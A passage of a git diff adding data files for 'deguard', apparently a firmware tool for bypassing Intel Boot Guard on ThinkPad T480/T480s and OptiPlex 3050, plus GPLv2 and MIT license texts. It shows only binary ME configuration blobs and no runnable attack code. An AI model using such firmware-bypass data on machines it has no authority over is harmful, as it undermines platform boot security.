/dev/null +++ b/blobs/t480/deguard/data/delta/optiplex_3050/home/mca/eom @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/mca/ish_policy b/blobs/t480/deguard/data/delta/optiplex_3050/home/mca/ish_policy new file mode 100644 index 00000000..f76dd238 Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/mca/ish_policy differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/mctp/device_ports b/blobs/t480/deguard/data/delta/optiplex_3050/home/mctp/device_ports new file mode 100644 index 00000000..593f4708 Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/mctp/device_ports differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/cfgmgr/cfg_rules b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/cfgmgr/cfg_rules new file mode 100644 index 00000000..91423d69 Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/cfgmgr/cfg_rules differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/hci/sysintid1 b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/hci/sysintid1 new file mode 100644 index 00000000..189a0a7f --- /dev/null +++ b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/hci/sysintid1 @@ -0,0 +1 @@ +´n$Ï \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/hci/sysintid2 b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/hci/sysintid2 new file mode 100644 index 00000000..9aab9a80 --- /dev/null +++ b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/hci/sysintid2 @@ -0,0 +1 @@ +¿ãt` \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/hci/sysintid3 b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/hci/sysintid3 new file mode 100644 index 00000000..6eb8dc47 --- /dev/null +++ b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/hci/sysintid3 @@ -0,0 +1 @@ +È®ï \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/pwdmgr/segreto b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/pwdmgr/segreto new file mode 100644 index 00000000..27f4db07 --- /dev/null +++ b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/pwdmgr/segreto @@ -0,0 +1 @@ +÷Þк \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/bup_sku/emu_fuse_map b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/bup_sku/emu_fuse_map new file mode 100644 index 00000000..e51cb421 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/bup_sku/emu_fuse_map differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/bup_sku/fuse_ip_base b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/bup_sku/fuse_ip_base new file mode 100644 index 00000000..756890b6 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/bup_sku/fuse_ip_base differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/bup_sku/plat_n_sku b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/bup_sku/plat_n_sku new file mode 100644 index 00000000..3b549bfe Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/bup_sku/plat_n_sku differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/invokemebx b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/invokemebx new file mode 100644 index 00000000..593f4708 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/invokemebx differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/mbp b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/mbp new file mode 100644 index 00000000..dd19cff4 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/mbp differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/gpio/csme_pins b/blobs/t480/deguard/data/delta/thinkpad_t480/home/gpio/csme_pins new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/dynregs b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/dynregs new file mode 100644 index 00000000..1cbeceeb Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/dynregs differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/header b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/header new file mode 100644 index 00000000..4b755560 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/header differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/namestr b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/namestr new file mode 100644 index 00000000..b0f3735c Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/namestr differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof1 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof1 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof10 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof10 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof2 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof2 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof3 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof3 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof4 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof4 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof5 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof5 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof6 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof6 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof7 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof7 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof8 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof8 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof9 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof9 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/mca/eom b/blobs/t480/deguard/data/delta/thinkpad_t480/home/mca/eom new file mode 100644 index 00000000..6b2aaa76 --- /dev/null +++ b/blobs/t480/deguard/data/delta/thinkpad_t480/home/mca/eom @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/mca/ish_policy b/blobs/t480/deguard/data/delta/thinkpad_t480/home/mca/ish_policy new file mode 100644 index 00000000..f76dd238 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/mca/ish_policy differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/mctp/device_ports b/blobs/t480/deguard/data/delta/thinkpad_t480/home/mctp/device_ports new file mode 100644 index 00000000..593f4708 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/mctp/device_ports differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/Bist/auto_config b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/Bist/auto_config new file mode 100644 index 00000000..009d73a3 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/Bist/auto_config differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/cfgmgr/cfg_rules b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/cfgmgr/cfg_rules new file mode 100644 index 00000000..c1e1e17a Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/cfgmgr/cfg_rules differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/hci/sysintid1 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/hci/sysintid1 new file mode 100644 index 00000000..b9954bdf --- /dev/null +++ b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/hci/sysintid1 @@ -0,0 +1,2 @@ +i@ +½ \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/hci/sysintid2 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/hci/sysintid2 new file mode 100644 index 00000000..77426ae8 --- /dev/null +++ b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/hci/sysintid2 @@ -0,0 +1 @@ +;K8” \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/hci/sysintid3 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/hci/sysintid3 new file mode 100644 index 00000000..98bfdd47 --- /dev/null +++ b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/hci/sysintid3 @@ -0,0 +1 @@ +ÖR \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/pwdmgr/segreto b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/pwdmgr/segreto new file mode 100644 index 00000000..b70c99ac --- /dev/null +++ b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/pwdmgr/segreto @@ -0,0 +1 @@ +&¢i¾ì \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/bup/bup_sku/plat_n_sku b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/bup/bup_sku/plat_n_sku new file mode 100644 index 00000000..d0514be7 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/bup/bup_sku/plat_n_sku differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/bup/mbp b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/bup/mbp new file mode 100644 index 00000000..f5f419c1 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/bup/mbp differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/gpio/csme_pins b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/gpio/csme_pins new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/dynregs b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/dynregs new file mode 100644 index 00000000..912ab357 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/dynregs differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/header b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/header new file mode 100644 index 00000000..4b755560 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/header differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/namestr b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/namestr new file mode 100644 index 00000000..b0f3735c Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/namestr differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof1 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof1 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof10 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof10 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof2 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof2 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof3 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof3 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof4 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof4 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof5 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof5 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof6 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof6 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof7 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof7 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof8 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof8 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof9 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof9 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/mca/eom b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/mca/eom new file mode 100644 index 00000000..6b2aaa76 --- /dev/null +++ b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/mca/eom @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/mca/ish_policy b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/mca/ish_policy new file mode 100644 index 00000000..f76dd238 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/mca/ish_policy differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/mctp/device_ports b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/mctp/device_ports new file mode 100644 index 00000000..593f4708 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/mctp/device_ports differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/Bist/auto_config b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/Bist/auto_config new file mode 100644 index 00000000..f66c9cf4 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/Bist/auto_config differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/cfgmgr/cfg_rules b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/cfgmgr/cfg_rules new file mode 100644 index 00000000..6243fe92 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/cfgmgr/cfg_rules differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/hci/sysintid1 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/hci/sysintid1 new file mode 100644 index 00000000..b508e576 --- /dev/null +++ b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/hci/sysintid1 @@ -0,0 +1 @@ +Zâ# \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/hci/sysintid2 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/hci/sysintid2 new file mode 100644 index 00000000..96116535 --- /dev/null +++ b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/hci/sysintid2 @@ -0,0 +1 @@ +²R˦ \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/hci/sysintid3 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/hci/sysintid3 new file mode 100644 index 00000000..7f55b1e9 --- /dev/null +++ b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/hci/sysintid3 @@ -0,0 +1 @@ +Œ¼6 \ No newline at end of file diff --git a/blobs/t480/deguard/data/fpfs/optiplex_3050 b/blobs/t480/deguard/data/fpfs/optiplex_3050 new file mode 100644 index 00000000..c3493e18 Binary files /dev/null and b/blobs/t480/deguard/data/fpfs/optiplex_3050 differ diff --git a/blobs/t480/deguard/data/fpfs/thinkpad_t480 b/blobs/t480/deguard/data/fpfs/thinkpad_t480 new file mode 100644 index 00000000..65fc3e7a Binary files /dev/null and b/blobs/t480/deguard/data/fpfs/thinkpad_t480 differ diff --git a/blobs/t480/deguard/data/fpfs/zero b/blobs/t480/deguard/data/fpfs/zero new file mode 100644 index 00000000..65f57c2e Binary files /dev/null and b/blobs/t480/deguard/data/fpfs/zero differ diff --git a/blobs/t480/deguard/doc/COPYING.txt b/blobs/t480/deguard/doc/COPYING.txt new file mode 100644 index 00000000..d159169d --- /dev/null +++ b/blobs/t480/deguard/doc/COPYING.txt @@ -0,0 +1,339 @@ + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License along + with this program; if not, write to the Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + , 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. diff --git a/blobs/t480/deguard/doc/LICENSE.orig b/blobs/t480/deguard/doc/LICENSE.orig new file mode 100644 index 00000000..ac6be728 --- /dev/null +++ b/blobs/t480/deguard/doc/LICENSE.orig @@ -0,0 +1,17 @@ +License for MFSUtil (CFG.py, MFS.py, MFSUtil.py) + +Copyright 2019 Youness El Alaoui + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 